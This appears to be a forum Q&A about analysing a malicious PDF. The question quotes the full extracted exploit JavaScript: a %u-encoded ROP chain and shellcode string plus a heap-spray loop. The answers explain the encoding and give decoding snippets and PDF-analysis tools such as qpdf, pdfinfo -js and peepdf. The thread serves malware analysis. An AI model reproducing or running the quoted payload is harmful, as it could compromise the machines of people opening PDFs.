I have a PDF file that I know for a fact contains a JavaScript script that does something malicious, though I'm not really sure what at this point.
I have successfully uncompressed the PDF file and extracted the plaintext JavaScript source code, but the code itself is kind of hidden in a syntax I haven't seen before.
Code example (this is what the majority of the code looks like):
var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')
I imagine that this notation, with its long variable/function names and hidden text characters, is meant to confuse scanners that look for this type of thing.
Two questions:
Question 1
Can someone tell me what this notation with the %u4141 is called?
Question 2
Is there some tool that will translate that notation into plaintext so I can see what it is doing?
Full JS code:
var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');
var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");
while (C.length + 20 + 8 < 65536) C+=C;
D = C.substring(0, (0x0c0c-0x24)/2);
D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";
It looks like you have already extracted the JavaScript from the PDF. Your problem seems to be with analyzing this JavaScript.
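As for the notation itself: %uXXXX is the non-standard Unicode escape form understood by JavaScript's legacy unescape() function, where each %uXXXX stands for one 16-bit code unit. In a script like this the decoded result is most likely binary data rather than readable text, so a hex dump tends to be more useful than printing the string. Here is a minimal sketch of such a decoder. The function names percentUToBytes and toHex are my own, and the little-endian byte order is an assumption (it matches how such strings are laid out in memory on x86):

```javascript
// Decode a string of %uXXXX escapes into raw bytes.
// Assumption: each 16-bit unit is emitted low byte first (little-endian).
function percentUToBytes(escaped) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})/g;
  let m;
  while ((m = re.exec(escaped)) !== null) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return bytes;
}

// Render a byte array as space-separated two-digit hex values.
function toHex(bytes) {
  return bytes.map((b) => b.toString(16).padStart(2, "0")).join(" ");
}

// First four escapes of the string from the question.
const sample = "%u4141%u4141%u63a5%u4a80";
console.log(toHex(percentUToBytes(sample)));
// prints: 41 41 41 41 a5 63 80 4a
```

The resulting bytes can then be written to a file and inspected with a hex editor or a disassembler. Do this on an isolated analysis machine, and never run the original script in a real PDF viewer.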
Since this topic (obfuscating and hiding malicious JavaScript code in harmless-looking PDF files) seems to be becoming more and more popular with malware authors, let me list some tools and websites which have proved helpful to anyone who's a beginner in dissecting this type of threat:
qpdf --qdf original.pdf unpacked.pdf
I don't know exactly how you extracted the JavaScript snippet you provided in your question. But by all means, don't rely on having found all of the JS code inside the PDF, unless you are a PDF expert who knows where to look and how to uncover all possible obfuscations. (I recommend you apply tool No. 3 to your source PDF and look at the resulting PDF in the light of the tips in No. 6... The other tools may need some more studying of PDF syntax before you can really make them useful to you.)
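As a rough first check on whether you have found everything, you can count how often the keys that usually introduce JavaScript appear in the unpacked PDF. The following is only a sketch under several assumptions: the function name countJsKeys is hypothetical, it only sees text that is stored uncompressed (for example in the unpacked.pdf produced by the qpdf command above), and it does not catch names that have been obfuscated:

```javascript
// Count occurrences of the PDF name keys that usually introduce JavaScript.
// Assumption: pdfText is the content of an already uncompressed PDF.
function countJsKeys(pdfText) {
  const keys = ["/JS", "/JavaScript"];
  const counts = {};
  for (const key of keys) {
    // Require whitespace, a PDF delimiter, or end of input after the key,
    // so that "/JS" does not match a longer name such as "/JSON".
    const re = new RegExp(key + "(?=[\\s/\\[\\]<>(){}%]|$)", "g");
    counts[key] = (pdfText.match(re) || []).length;
  }
  return counts;
}

// Small inline example of an action dictionary.
const sample = "<< /Type /Action /S /JavaScript /JS (app.alert(1)) >>";
console.log(countJsKeys(sample));

// For a real file (Node.js), something like:
//   countJsKeys(require("fs").readFileSync("unpacked.pdf", "latin1"))
```

If the counts are higher than the number of scripts you extracted, there is probably more JavaScript to find. A count of zero proves nothing, though, for the reasons given above.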
Here is an update to my (almost 3-year-old) answer. It's worthwhile to add:
pdfinfo -js: the most recent (Poppler-based, not XPDF-based!) versions of pdfinfo (starting with v0.25.0, released Dec 11, 2013) now know the -js command line parameter, which prints out the JavaScript code embedded in a PDF file. This works even in many cases where the /JavaScript name within the PDF source code is obfuscated by using (formally legal) PDF name constructs such as /#4Aavascript or /J#61v#61script or similar.
Unfortunately, this marvelous feature addition to pdfinfo is still far too little known. Please share!
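To see why such obfuscated names are still legal: inside a PDF name, a # followed by two hex digits stands for the character with that code. A minimal sketch of undoing this by hand, where decodePdfName is a hypothetical helper name of my own:

```javascript
// Replace every #xx escape in a PDF name with the character it encodes.
function decodePdfName(name) {
  return name.replace(/#([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

console.log(decodePdfName("/J#61v#61script"));
// prints: /Javascript
```

Running every name through a function like this before searching makes a plain text search for the JavaScript keys much harder to evade.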
Another update, because the above-mentioned peepdf tool recently got the extract sub-command added:
peepdf.py: This is a Python-based command line tool which can analyse PDF files. It was developed by Jose Miguel Esparza mainly in order to "find out if the file can be harmful or not", but is also very good for general exploration of PDF file structures.
Installation and usage:
Clone the GitHub repository:
git clone https://github.com/jesparza/peepdf git.peepdf
Take the peepdf.py script and put it somewhere into your $PATH:
cd git.peepdf ; ln -s $(pwd)/peepdf.py ${HOME}/bin/peepdf.py
Open your PDF with it:
peepdf.py -fil my.pdf
Use the extract js > all-js-in-my.pdf command to extract and redirect all JavaScript contained in my.pdf into a file. This is depicted by the screenshots below: